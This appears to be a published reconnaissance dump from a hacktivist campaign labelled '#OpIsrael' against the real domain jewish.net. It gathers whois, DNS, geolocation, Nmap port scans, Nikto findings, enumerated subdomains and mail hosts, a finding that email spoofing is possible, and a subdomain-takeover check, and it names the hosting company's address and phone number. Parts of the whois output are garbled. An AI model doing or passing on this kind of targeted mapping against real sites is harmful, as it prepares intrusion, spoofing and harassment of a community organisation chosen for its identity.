Anonymous JTSEC #OpIsrael Full Recon #11

######################################################################################################################################
Hostname 	www.jewish.net 	  	ISP 	Global Net Access, LLC
Continent 	North America 	  	Flag
US
Country 	United States 	  	Country Code 	US
Region 	Texas 	  	Local time 	12 Nov 2018 17:15 CST
City 	Spring 	  	Postal Code 	77388
IP Address 	69.73.184.159 	  	Latitude 	30.051
  	  	  	Longitude 	-95.47

#######################################################################################################################################
> www.jewish.net
Server:		194.187.251.67
Address:	194.187.251.67#53

Non-authoritative answer:
www.jewish.net	canonical name = jewish.net.
Name:	jewish.net
Address: 69.73.184.159
#######################################################################################################################################
HostIP:69.73.184.159
HostName:www.jewish.net

Gathered Inet-whois information for 69.73.184.159
--------------------------------------------------------------------------------------------------------------------------------------


inetnum:        69.6.64.0 - 69.94.111.255
netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr:          IPv4 address block not managed by the RIPE NCC
remarks:        ------------------------------------------------------
remarks:
remarks:        You can find the whois server to query, or the
remarks:        IANA registry to query on this web page:
remarks:        http://www.iana.org/assignments/ipv4-address-space
remarks:
remarks:        You can access databases of other RIRs at:
remarks:
remarks:        AFRINIC (Africa)
remarks:        http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks:        APNIC (Asia Pacific)
remarks:        http://www.apnic.net/ whois.apnic.net
remarks:
remarks:        ARIN (Northern America)
remarks:        http://www.arin.net/  whois.arin.net
remarks:
remarks:        LACNIC (Latin America and the Carribean)
remarks:        http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks:        IANA IPV4 Recovered Address Space
remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
remarks:
remarks:        ------------------------------------------------------
country:        EU # Country is really world wide
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
status:         ALLOCATED UNSPECIFIED
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RIPE-NCC-HM-MNT
created:        2018-02-20T15:36:33Z
last-modified:  2018-09-04T13:34:51Z
source:         RIPE

role:           Internet Assigned Numbers Authority
address:        see http://www.iana.org.
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
nic-hdl:        IANA1-RIPE
remarks:        For more information on IANA services
remarks:        go to IANA web site at http://www.iana.org.
mnt-by:         RIPE-NCC-MNT
created:        1970-01-01T00:00:00Z
last-modified:  2001-09-22T09:31:27Z
source:         RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)


Gathered Inic-whois information for jewish.net
---------------------------------------------------------------------------------------------------------------------------------------
   Domain Name: JEWISH.NET
   Registry Domain ID: 1895875_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.godaddy.com
   Registrar URL: http://www.godaddy.com
   Updated Date: 2018-02-16T10:48:18Z
   Creation Date: 1997-05-21T04:00:00Z
   Registry Expiry Date: 2021-05-22T04:00:00Z
   Registrar: GoDaddy.com, LLC
   Registrar IANA ID: 146
   Registrar Abuse Contact Email: abuse@godaddy.com
   Registrar Abuse Contact Phone: 480-624-2505
   Domain Status: clientDeleteProhibited https:/�U@cann.�~Ho0rg/�epp#cl�
                                                                        �ieU@ntDel�
                                                                                   �et�U@e�U@h�������ibited
   Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: NS33.DOMAINCONTROL.COM
   Name Server: NS34.DOMAINCONTROL.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
<<> Last update of whois database: 2018-11-12T23jV@:21:5�zH00Z <

For more information on Whois status codes, please visit https://icann.org/epp

�OTICE: The expiration date displayed in this reYV@date �zHt0he
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
�an�U@dme Jrough the use of electronic processes�U@ that�~H 0aret high-D
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that yo�U@u may�~H 0use� this �
                                                                        �DaU@ta on�
                                                                                   �ly�U@
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of YV@VeriS�zHi0gn.� You a�
                                                                        �grXV@ee no�
                                                                                    �t gV@to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
0eserves the right to modify these terms at any �U@time.�~H

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Gathered Netcraft information for www.jewish.net
---------------------------------------------------------------------------------------------------------------------------------------

Retrieving Netcraft.com information for www.jewish.net
Netcraft.com Information gathered

Gathered Subdomain information for jewish.net
---------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
HostName:www.jewish.net
HostIP:69.73.184.159
Searching Altavista.com:80...
Found 1 possible subdomain(s) for host jewish.net, Searched 0 pages containing 0 results

Gathered E-Mail information for jewish.net
---------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 E-Mail(s) for host jewish.net, Searched 0 pages containing 0 results

Gathered TCP Port information for 69.73.184.159
---------------------------------------------------------------------------------------------------------------------------------------

 Port		State

21/tcp		open
22/tcp		open
26/tcp		open
80/tcp		open
110/tcp		open
143/tcp		open

Portscan Finished: Scanned 150 ports, 5 ports were in state closed

######################################################################################################################################

[i] Scanning Site: http://www.jewish.net


B A S I C   I N F O
======================================================================================================================================


[+] Site Title:
[+] IP address: 69.73.184.159
[+] Web Server: Could Not Detect
[+] CMS: Could Not Detect
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!


W H O I S   L O O K U P
======================================================================================================================================

	   Domain Name: JEWISH.NET
   Registry Domain ID: 1895875_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.godaddy.com
   Registrar URL: http://www.godaddy.com
   Updated Date: 2018-02-16T10:48:18Z
   Creation Date: 1997-05-21T04:00:00Z
   Registry Expiry Date: 2021-05-22T04:00:00Z
   Registrar: GoDaddy.com, LLC
   Registrar IANA ID: 146
   Registrar Abuse Contact Email: abuse@godaddy.com
   Registrar Abuse Contact Phone: 480-624-2505
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: NS33.DOMAINCONTROL.COM
   Name Server: NS34.DOMAINCONTROL.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-11-12T23:29:54Z <<<

For more information on Whois status codes, please visit https://icann.org/epp


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.


G E O  I P  L O O K  U P
======================================================================================================================================

[i] IP Address: 69.73.184.159
[i] Country: US
[i] State: Texas
[i] City: Spring
[i] Latitude: 30.079901
[i] Longitude: -95.417198


H T T P   H E A D E R S
=======================================================================================================================================


[i]  HTTP/1.1 200 OK
[i]  Date: Mon, 12 Nov 2018 23:30:03 GMT
[i]  Accept-Ranges: bytes
[i]  Content-Type: text/html
[i]  Connection: close


D N S   L O O K U P
=======================================================================================================================================

jewish.net.		1799	IN	A	69.73.184.159
jewish.net.		3599	IN	NS	ns33.domaincontrol.com.
jewish.net.		3599	IN	NS	ns34.domaincontrol.com.
jewish.net.		3599	IN	SOA	ns33.domaincontrol.com. dns.jomax.net. 2017060501 28800 7200 604800 3600
jewish.net.		3599	IN	MX	20 ALT1.ASPMX.L.GOOGLE.COM.et.
jewish.net.		3599	IN	MX	30 ALT2.ASPMX.L.GOOGLE.com.
jewish.net.		3599	IN	MX	10 ASPMX.L.GOOGLE.com.
jewish.net.		3599	IN	MX	40 ASPMX2.GOOGLEMAIL.com.
jewish.net.		3599	IN	MX	50 ASPMX3.GOOGLEMAIL.com.


S U B N E T   C A L C U L A T I O N
=======================================================================================================================================

Address       = 69.73.184.159
Network       = 69.73.184.159 / 32
Netmask       = 255.255.255.255
Broadcast     = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits    = 0
Max. Hosts    = 1   (2^0 - 0)
Host Range    = { 69.73.184.159 - 69.73.184.159 }


N M A P   P O R T   S C A N
=======================================================================================================================================


Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-12 23:30 UTC
Nmap scan report for jewish.net (69.73.184.159)
Host is up (0.020s latency).
rDNS record for 69.73.184.159: finn.nocdirect.com
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   filtered telnet
80/tcp   open     http
110/tcp  open     pop3
143/tcp  open     imap
443/tcp  open     https
3389/tcp filtered ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds


S U B - D O M A I N   F I N D E R
=======================================================================================================================================


[i] Total Subdomains Found : 4

[+] Subdomain: vps1.jewish.net
[-] IP: 209.217.253.175

[+] Subdomain: vps2.jewish.net
[-] IP: 209.140.30.90

[+] Subdomain: vps3.jewish.net
[-] IP: 209.140.28.114

[+] Subdomain: update.jewish.net
[-] IP: 209.140.28.114

#######################################################################################################################################

[?] Enter the target: http://www.jewish.net/
[!] IP Address : 69.73.184.159
[!] www.jewish.net doesn't seem to use a CMS
[+] Honeypot Probabilty: 30%
---------------------------------------------------------------------------------------------------------------------------------------
[~] Trying to gather whois information for www.jewish.net
[+] Whois information found
[-] Unable to build response, visit https://who.is/whois/www.jewish.net
--------------------------------------------------------------------------------------------------------------------------------------
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   filtered telnet
80/tcp   open     http
110/tcp  open     pop3
143/tcp  open     imap
443/tcp  open     https
3389/tcp filtered ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
---------------------------------------------------------------------------------------------------------------------------------------

[+] DNS Records
ns34.domaincontrol.com. (173.201.74.17) AS26496 GoDaddy.com, LLC United States
ns33.domaincontrol.com. (216.69.185.17) AS26496 GoDaddy.com, LLC United States

[+] MX Records
30 (74.125.193.27) AS15169 Google Inc. United States

[+] MX Records
10 (172.217.197.27) AS15169 Google Inc. United States

[+] MX Records
40 (64.233.186.26) AS15169 Google Inc. United States

[+] MX Records
50 (74.125.193.26) AS15169 Google Inc. United States

[+] Host Records (A)
www.jewish.netHTTP: (finn.nocdirect.com) (69.73.184.159) AS3595 Global Net Access, LLC United States

[+] TXT Records

[+] DNS Map: https://dnsdumpster.com/static/map/jewish.net.png

[>] Initiating 3 intel modules
[>] Loading Alpha module (1/3)
[>] Beta module deployed (2/3)
[>] Gamma module initiated (3/3)
No emails found
No hosts found
[+] Virtual hosts:
--------------------------------------------------------------------------------------------------------------------------------------
######################################################################################################################################
-------------------------------------------------------------------------------------------------------------------------------------
+ Target IP:          69.73.184.159
+ Target Hostname:    www.jewish.net
+ Target Port:        80
+ Start Time:         2018-11-12 18:19:41 (GMT-5)
---------------------------------------------------------------------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
+ End Time:           2018-11-12 18:26:34 (GMT-5) (413 seconds)
--------------------------------------------------------------------------------------------------------------------------------------
######################################################################################################################################
---------------------------------------------------------------------------------------------------------------------------------------
+ Target IP:          69.73.184.159
+ Target Hostname:    69.73.184.159
+ Target Port:        443
---------------------------------------------------------------------------------------------------------------------------------------
+ SSL Info:        Subject:  /CN=finn.nocdirect.com.zz
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /CN=finn.nocdirect.com.zz
+ Start Time:         2018-11-12 18:21:16 (GMT-5)
--------------------------------------------------------------------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
: Connection timed out
+ Scan terminated:  20 error(s) and 4 item(s) reported on remote host
+ End Time:           2018-11-12 18:28:06 (GMT-5) (410 seconds)
--------------------------------------------------------------------------------------------------------------------------------------
######################################################################################################################################
[+] Hosting Info for Website: www.jewish.net
 [+] Visitors per day: < 200
 [+] IP Address: 69.73.184.159
 [+] IP Reverse DNS (Host): finn.nocdirect.com
 [+] Hosting IP Range: 69.73.128.0 - 69.73.191.255 (16,384 ip)
 [+] Hosting Address: 2626 Spring Cypress Road, Spring, TX, 77388, US
 [+] Hosting Country: USA
 [+] Hosting Phone: +1-281-942-2800
 [+] Hosting Website: www.networktransit.net
 [+] CIDR: 69.73.128.0/18
 [+] Hosting CIDR: 69.73.128.0/18

 [+] NS: jewish.net
 [+] NS: ns33.domaincontrol.com
 [+] NS: ns34.domaincontrol.com
#######################################################################################################################################

; <<>> DiG 9.11.5-1-Debian <<>> jewish.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54838
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jewish.net.			IN	A

;; ANSWER SECTION:
jewish.net.		1800	IN	A	69.73.184.159

;; Query time: 143 msec
;; SERVER: 194.187.251.67#53(194.187.251.67)
;; WHEN: lun nov 12 18:51:17 EST 2018
;; MSG SIZE  rcvd: 55

######################################################################################################################################

; <<>> DiG 9.11.5-1-Debian <<>> +trace jewish.net
;; global options: +cmd
.			84677	IN	NS	e.root-servers.net.
.			84677	IN	NS	f.root-servers.net.
.			84677	IN	NS	m.root-servers.net.
.			84677	IN	NS	i.root-servers.net.
.			84677	IN	NS	h.root-servers.net.
.			84677	IN	NS	c.root-servers.net.
.			84677	IN	NS	d.root-servers.net.
.			84677	IN	NS	a.root-servers.net.
.			84677	IN	NS	l.root-servers.net.
.			84677	IN	NS	g.root-servers.net.
.			84677	IN	NS	b.root-servers.net.
.			84677	IN	NS	j.root-servers.net.
.			84677	IN	NS	k.root-servers.net.
.			84677	IN	RRSIG	NS 8 0 518400 20181125170000 20181112160000 2134 . j4dK8ZhBRxbwKKnFW+JtmtK9/SEOrKadV7KLXxE+MdXi7lEbPdeHwyO3 SKwAaMtOA1wla7tEP94C/7P0o9oztfesyTErvWY7ihkbRenZFxa2bY62 eYohQCNyedJj1bo1K/KrZjX/ixeynC2bq5f4MXH7mWTVFvFload2MqPH 1BBl/xAVIghpJe604i4oB7mEPlznlYyDPPLnJzMii45ZRbXe3AU/9adY FRkrxt3VbHnFUGcFyIqcLdzwKtpj5R7fAqPdtVs5+VXYmPuSGqFNQ8BP tgoJRA7lOAQ2eT5/Clg15MkEHDwPJ/+inztfg9tQq2PTWkpg800TohHr +Y2JEg==
;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 132 ms

net.			172800	IN	NS	a.gtld-servers.net.
net.			172800	IN	NS	b.gtld-servers.net.
net.			172800	IN	NS	c.gtld-servers.net.
net.			172800	IN	NS	d.gtld-servers.net.
net.			172800	IN	NS	e.gtld-servers.net.
net.			172800	IN	NS	f.gtld-servers.net.
net.			172800	IN	NS	g.gtld-servers.net.
net.			172800	IN	NS	h.gtld-servers.net.
net.			172800	IN	NS	i.gtld-servers.net.
net.			172800	IN	NS	j.gtld-servers.net.
net.			172800	IN	NS	k.gtld-servers.net.
net.			172800	IN	NS	l.gtld-servers.net.
net.			172800	IN	NS	m.gtld-servers.net.
net.			86400	IN	DS	35886 8 2 7862B27F5F516EBE19680444D4CE5E762981931842C465F00236401D 8BD973EE
net.			86400	IN	RRSIG	DS 8 1 86400 20181125170000 20181112160000 2134 . 2m7FFQ+rJsxmfmS3yFvcc1zbQU2EkZlKzPtmRji5jrpNHDd+UKS1kA9j N4t/oXy27f3AiH+K8jHlOOqnl77ihyTZ54tBQHTL0pb2GjBbiNsGmJUc NoTAYbmZ7VJTvE8DrkY/I2ZtlMYDCZrKsOWG+hf6HWfgQO3gyqu7Momr PUNHXs10fv31T94/D3E8m+RMc4tKlia+5cWwfoN3kqwjRxtEOjgYXMFN HIIppGEWEGmXHfAJhW2osdFVM3wLWi/jql3WqBoJgHj0GnbA6Z04ZB6P m2PRB8up3/ZarNlJ6+piAI5B5ExwXnxo4AIyqDqYg1sQDhAsbJQJ+TwE ul+vIQ==
;; Received 1167 bytes from 2001:7fd::1#53(k.root-servers.net) in 136 ms

jewish.net.		172800	IN	NS	ns33.domaincontrol.com.
jewish.net.		172800	IN	NS	ns34.domaincontrol.com.
A1RT98BS5QGC9NFI51S9HCI47ULJG6JH.net. 86400 IN NSEC3 1 1 0 - A1RUUFFJKCT2Q54P78F8EJGJ8JBK7I8B NS SOA RRSIG DNSKEY NSEC3PARAM
A1RT98BS5QGC9NFI51S9HCI47ULJG6JH.net. 86400 IN RRSIG NSEC3 8 2 86400 20181116062711 20181109051711 6140 net. wrG8JgFFtuyQ5Re8TfxvOqM4SQwLK54XFMgDJzzMtOLNBNro4a+/TVy+ 3psbwhp8vLA8CIL6QMbQe7KQYkbXsVXiYzGNn/Ywp2Kk5DYHZc95foRe Tk2QAJUqVjBzr5O9+G6F62tVM+t0N2expPKlL2AqhQu2hDIPdSPm5K7M i2U=
NFMMI3N1148H3LEPNQB26PTI6JHN9CVT.net. 86400 IN NSEC3 1 1 0 - NFN5TMSMHCFFAK16T6L9MF4CM6HTH12J NS DS RRSIG
NFMMI3N1148H3LEPNQB26PTI6JHN9CVT.net. 86400 IN RRSIG NSEC3 8 2 86400 20181116062223 20181109051223 6140 net. Ma8UDXqe1pT+q3QGtClajQpf/iXJHnhpvIqWZ5RSccaj/kGgn//V0QJH 4DdTtCgyIGobmETcLugFy1/biZI+q1Yy8hOBHCMqgn/QDmT1hwoDNRJs OnvbKcEnz1Cwc4kqDuxlsZQB34px8rMr8q0n7+FqCkISQ0+7pCc6zJbg m9o=
;; Received 667 bytes from 2001:503:eea3::30#53(g.gtld-servers.net) in 134 ms

jewish.net.		1800	IN	A	69.73.184.159
jewish.net.		3600	IN	NS	ns33.domaincontrol.com.
jewish.net.		3600	IN	NS	ns34.domaincontrol.com.
;; Received 110 bytes from 2603:5:22a1::11#53(ns34.domaincontrol.com) in 133 ms
######################################################################################################################################
[*] Performing General Enumeration of Domain: jewish.net
[-] DNSSEC is not configured for jewish.net
[*] 	 SOA ns33.domaincontrol.com 216.69.185.17
[*] 	 NS ns33.domaincontrol.com 216.69.185.17
[*] 	 NS ns33.domaincontrol.com 2607:f208:206::11
[*] 	 NS ns34.domaincontrol.com 173.201.74.17
[*] 	 NS ns34.domaincontrol.com 2603:5:22a1::11
[*] 	 MX ASPMX.L.GOOGLE.COM 74.125.133.26
[*] 	 MX ALT2.ASPMX.L.GOOGLE.COM 172.217.194.27
[*] 	 MX ASPMX2.GOOGLEMAIL.COM 64.233.164.27
[*] 	 MX ASPMX3.GOOGLEMAIL.COM 172.217.194.26
[*] 	 MX ASPMX.L.GOOGLE.COM 2a00:1450:400c:c06::1b
[*] 	 MX ALT2.ASPMX.L.GOOGLE.COM 2404:6800:4003:c04::1a
[*] 	 MX ASPMX2.GOOGLEMAIL.COM 2a00:1450:4010:c07::1b
[*] 	 A jewish.net 69.73.184.159
[*] Enumerating SRV Records
[-] No SRV Records Found for jewish.net
[+] 0 Records Found
######################################################################################################################################
[*] Processing domain jewish.net
[+] Getting nameservers
216.69.185.17 - ns33.domaincontrol.com
173.201.74.17 - ns34.domaincontrol.com
[-] Zone transfer failed

[+] MX records found, added to target list
10 ASPMX.L.GOOGLE.COM.
30 ALT2.ASPMX.L.GOOGLE.COM.
40 ASPMX2.GOOGLEMAIL.COM.
20 ALT1.ASPMX.L.GOOGLE.COM.et.
50 ASPMX3.GOOGLEMAIL.COM.

[*] Scanning jewish.net for A records
69.73.184.159 - jewish.net
69.73.184.159 - ftp.jewish.net
209.140.28.114 - update.jewish.net
209.217.253.175 - vps1.jewish.net
209.140.30.90 - vps2.jewish.net
68.178.252.5 - webmail.jewish.net
72.167.218.55 - webmail.jewish.net
173.201.192.133 - webmail.jewish.net
173.201.192.5 - webmail.jewish.net
173.201.193.133 - webmail.jewish.net
173.201.193.20 - webmail.jewish.net
173.201.192.20 - webmail.jewish.net
173.201.193.5 - webmail.jewish.net
173.201.192.148 - webmail.jewish.net
72.167.218.173 - webmail.jewish.net
68.178.252.148 - webmail.jewish.net
97.74.135.45 - webmail.jewish.net
68.178.252.20 - webmail.jewish.net
68.178.252.133 - webmail.jewish.net
72.167.218.183 - webmail.jewish.net
45.40.130.40 - webmail.jewish.net
97.74.135.148 - webmail.jewish.net
72.167.218.45 - webmail.jewish.net
45.40.130.41 - webmail.jewish.net
97.74.135.55 - webmail.jewish.net
97.74.135.133 - webmail.jewish.net
173.201.193.148 - webmail.jewish.net
69.73.184.159 - www.jewish.net
######################################################################################################################################
Total hosts: 9

[-] Resolving hostnames IPs...

...jewish-net:empty
vps1.jewish.net:209.217.253.175
vps3.jewish.net:209.140.28.114
www.jewish-net:empty
www.jewish.net:69.73.184.159
www.vps1.jewish.net:empty
www.vps3.jewish.net:empty

#####################################################################################################################################

Ip Address	Status	Type	Domain Name			Server
---------------------------------------------------------------------------------------------------------------------------------------
69.73.184.159   200     alias   ftp.jewish.net
69.73.184.159	200	host	jewish.net
209.140.28.114          host    update.jewish.net
72.167.218.173  301     alias   webmail.jewish.net
72.167.218.173	301	alias	webmail.secureserver.net
72.167.218.173	301	host	email.secureserver.net
72.167.218.183	301	host	email.secureserver.net
173.201.193.133	301	host	email.secureserver.net
173.201.192.20	301	host	email.secureserver.net
173.201.193.148	301	host	email.secureserver.net
72.167.218.55	301	host	email.secureserver.net
45.40.130.41	301	host	email.secureserver.net
72.167.218.45	301	host	email.secureserver.net
173.201.192.148	301	host	email.secureserver.net
173.201.192.5	301	host	email.secureserver.net
68.178.252.5	301	host	email.secureserver.net
97.74.135.55	301	host	email.secureserver.net
97.74.135.148	301	host	email.secureserver.net
173.201.193.20	301	host	email.secureserver.net
173.201.193.5	301	host	email.secureserver.net
97.74.135.45	301	host	email.secureserver.net
68.178.252.148	301	host	email.secureserver.net
173.201.192.133	301	host	email.secureserver.net
68.178.252.133	301	host	email.secureserver.net
68.178.252.20	301	host	email.secureserver.net
97.74.135.133	301	host	email.secureserver.net
45.40.130.40	301	host	email.secureserver.net
69.73.184.159   200     alias   www.jewish.net			Apache
69.73.184.159	200	host	jewish.net			Apache
######################################################################################################################################
[+] Testing domain
     	www.jewish.net           69.73.184.159
[+] Dns resolving
       Domain name               Ip address              Name server
        jewish.net             69.73.184.159          finn.nocdirect.com
Found 1 host(s) for jewish.net
[+] Testing wildcard
	Ok, no wildcard found.

[+] Scanning for subdomain on jewish.net
[!] Wordlist not specified. I scannig with my internal wordlist...
    Estimated time about 69.62 seconds

        Subdomain                Ip address              Name server

      ftp.jewish.net           69.73.184.159          finn.nocdirect.com
    update.jewish.net          209.140.28.114     vps.moviesonlinefreestreaming.org
    webmail.jewish.net          45.40.130.40      p3plgemwbe26-v05.prod.phx3.secureserver.net
      www.jewish.net           69.73.184.159          finn.nocdirect.com

######################################################################################################################################
dnsenum VERSION:1.2.4

-----   www.jewish.net   -----


Host's addresses:
__________________

jewish.net.                              1604     IN    A        69.73.184.159


Name Servers:
______________

ns33.domaincontrol.com.                  86399    IN    A        216.69.185.17
ns34.domaincontrol.com.                  86399    IN    A        173.201.74.17


Mail (MX) Servers:
___________________

ASPMX3.GOOGLEMAIL.COM.                   293      IN    A        172.217.194.26
ASPMX2.GOOGLEMAIL.COM.                   293      IN    A        64.233.164.26
ALT2.ASPMX.L.GOOGLE.COM.                 211      IN    A        172.217.194.26
ASPMX.L.GOOGLE.COM.                      200      IN    A        108.177.15.26


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for www.jewish.net on ns33.domaincontrol.com ...

Trying Zone Transfer for www.jewish.net on ns34.domaincontrol.com ...

brute force file not specified, bay.
######################################################################################################################################


Running Source: [33;1;1mAsk
Running Source: [33;1;1mArchive.is
Running Source: [33;1;1mBaidu
Running Source: [33;1;1mBing
Running Source: [33;1;1mCertDB
Running Source: [33;1;1mCertificateTransparency
Running Source: [33;1;1mCertspotter
Running Source: [33;1;1mCommoncrawl
Running Source: [33;1;1mCrt.sh
Running Source: [33;1;1mDnsdb
Running Source: [33;1;1mDNSDumpster
Running Source: [33;1;1mDNSTable
Running Source: [33;1;1mDogpile
Running Source: [33;1;1mExalead
Running Source: [33;1;1mFindsubdomains
Running Source: [33;1;1mGoogleter
Running Source: [33;1;1mHackertarget
Running Source: [33;1;1mIpv4Info
Running Source: [33;1;1mPTRArchive
Running Source: [33;1;1mSitedossier
Running Source: [33;1;1mThreatcrowd
Running Source: [33;1;1mThreatMiner
Running Source: [33;1;1mWaybackArchive
Running Source: [33;1;1mYahoo

Running enumeration on www.jewish.net

dnsdb: Unexpected return status 503

waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.jewish.net/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.jewish.net/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer


Starting Bruteforcing of [33;1;1mwww.jewish.net with [33;1;1m9985 words

Total [33;1;1m1 Unique subdomains found for www.jewish.net

.www.jewish.net
######################################################################################################################################
[*] Processing domain www.jewish.net
[+] Getting nameservers
216.69.185.17 - ns33.domaincontrol.com
173.201.74.17 - ns34.domaincontrol.com
[-] Zone transfer failed

[+] MX records found, added to target list
50 ASPMX3.GOOGLEMAIL.COM.
40 ASPMX2.GOOGLEMAIL.COM.
30 ALT2.ASPMX.L.GOOGLE.COM.
10 ASPMX.L.GOOGLE.COM.
20 ALT1.ASPMX.L.GOOGLE.COM.et.

[*] Scanning www.jewish.net for A records
69.73.184.159 - www.jewish.net

######################################################################################################################################
[+] www.jewish.net has no SPF record!
[*] No DMARC record found. Looking for organizational record
[+] No organizational DMARC record
[+] Spoofing possible for www.jewish.net!
######################################################################################################################################
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  discover v0.5.0 - by @michenriksen

Identifying nameservers for www.jewish.net... Done
Using nameservers:

 - 216.69.185.17
 - 173.201.74.17

Checking for wildcard DNS... Done

Running collector: Threat Crowd... Done (0 hosts)
Running collector: DNSDB... Error
 -> DNSDB returned unexpected response code: 503
Running collector: Netcraft... Done (0 hosts)
Running collector: PublicWWW... Done (0 hosts)
Running collector: Censys... Skipped
 -> Key 'censys_secret' has not been set
Running collector: Wayback Machine... Done (4 hosts)
Running collector: PTRArchive... Error
 -> PTRArchive returned unexpected response code: 502
Running collector: PassiveTotal... Skipped
 -> Key 'passivetotal_key' has not been set
Running collector: Shodan... Skipped
 -> Key 'shodan' has not been set
Running collector: Riddler... Skipped
 -> Key 'riddler_username' has not been set
Running collector: VirusTotal... Skipped
 -> Key 'virustotal' has not been set
Running collector: Dictionary... Done (0 hosts)
Running collector: HackerTarget... Done (1 host)
Running collector: Google Transparency Report... Done (0 hosts)
Running collector: Certificate Search... Done (0 hosts)

Resolving 4 unique hosts...
69.73.184.159   jewish.net
209.140.28.114  update.jewish.net
69.73.184.159   www.jewish.net

Found subnets:

 - 69.73.184.0-255   : 2 hosts

Wrote 3 hosts to:

 - file:///root/aquatone/www.jewish.net/hosts.txt
 - file:///root/aquatone/www.jewish.net/hosts.json
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  takeover v0.5.0 - by @michenriksen

Loaded 3 hosts from /root/aquatone/www.jewish.net/hosts.json
Loaded 25 domain takeover detectors

Identifying nameservers for www.jewish.net... Done
Using nameservers:

 - 216.69.185.17
 - 173.201.74.17

Checking hosts for domain takeover vulnerabilities...

Finished checking hosts:

 - Vulnerable     : 0
 - Not Vulnerable : 3

Wrote 0 potential subdomain takeovers to:

 - file:///root/aquatone/www.jewish.net/takeovers.json

                           __
